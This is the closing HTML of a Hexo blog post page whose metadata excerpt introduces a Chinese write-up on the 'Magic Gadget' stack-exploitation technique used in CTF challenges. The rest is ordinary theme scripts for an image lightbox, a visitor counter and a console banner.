          stripContent: "Magic Gadget 前言:我在最近两周接触到了这个技巧,在不断的学习中发现这个技巧的巧妙,运用之广,真的让人惊讶.帮我解决了此前的栈相关的两道难题,并在TGCTF中抢到only_gets的一血 普遍性:1._do_global_dtors_aux函数常见于编译后的二进制文件（尤其是 C&amp;#x2F;C++ 程序），它与 全局对象析构 和 程序终止时的清理逻辑 相关.说明是这个函数普遍存在于二进制文件中2._libc_csu_init 作为初始化函数,普遍存在于二进制文件中 原理1.ret2c",
          date: "Tue Apr 15 2025 17:49:32 GMT+0800",
          updated: "Fri Jul 04 2025 14:17:32 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      
        








      
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.8.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>









    
  </body>
  </html>

